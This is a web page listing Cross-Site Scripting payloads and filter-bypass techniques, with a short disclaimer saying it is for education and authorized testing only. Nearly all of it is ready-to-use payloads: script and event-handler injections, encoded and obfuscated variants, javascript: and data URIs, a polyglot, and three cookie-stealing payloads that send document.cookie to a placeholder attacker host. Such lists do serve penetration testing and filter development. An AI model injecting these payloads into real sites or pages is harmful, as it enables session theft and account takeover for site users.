Loading...
Loading...
Cross-Site Scripting payloads and filter bypass techniques.
Educational purposes only. Only test on systems you own or have explicit authorization.
Basic script tag
<script>alert(1)</script>Show domain
<script>alert(document.domain)</script>Show cookies
<script>alert(document.cookie)</script>Image error handler
<img src=x onerror=alert(1)>SVG onload
<svg onload=alert(1)>Body onload
<body onload=alert(1)>Mouse over event
<div onmouseover=alert(1)>hover me</div>Auto focus input
<input onfocus=alert(1) autofocus>Marquee start
<marquee onstart=alert(1)>Video source error
<video><source onerror=alert(1)>Details toggle
<details open ontoggle=alert(1)>Select focus
<select onfocus=alert(1) autofocus>Mixed case
<ScRiPt>alert(1)</ScRiPt>Template literals
<script>alert`1`</script>Quoted attribute
<img src=x onerror="alert(1)">HTML entities
<img src=x onerror=alert(1)>No space needed
<svg/onload=alert(1)>Break out of attribute
"><script>alert(1)</script>Break out of JS string
'-alert(1)-'Base64 encoded
<script>eval(atob("YWxlcnQoMSk="))</script>Unicode escape
<script>\u0061lert(1)</script>HTML decimal
<img src=x onerror=alert(1)>HTML hex
<img src=x onerror=alert(1)>URL encoded
%3Cscript%3Ealert(1)%3C/script%3EFragment injection
#<script>alert(1)</script>JavaScript protocol
javascript:alert(1)Data URI
data:text/html,<script>alert(1)</script>Anchor href
<a href="javascript:alert(1)">click</a>Iframe src
<iframe src="javascript:alert(1)">Image request
<script>new Image().src="http://attacker.com/?c="+document.cookie</script>Fetch API
<script>fetch("http://attacker.com/?c="+document.cookie)</script>Redirect with cookie
<img src=x onerror="location='http://attacker.com/?c='+document.cookie">Multi-context polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//...HTML/JS context
"><img src=x onerror=alert(1)>//JS string context
'-alert(1)-'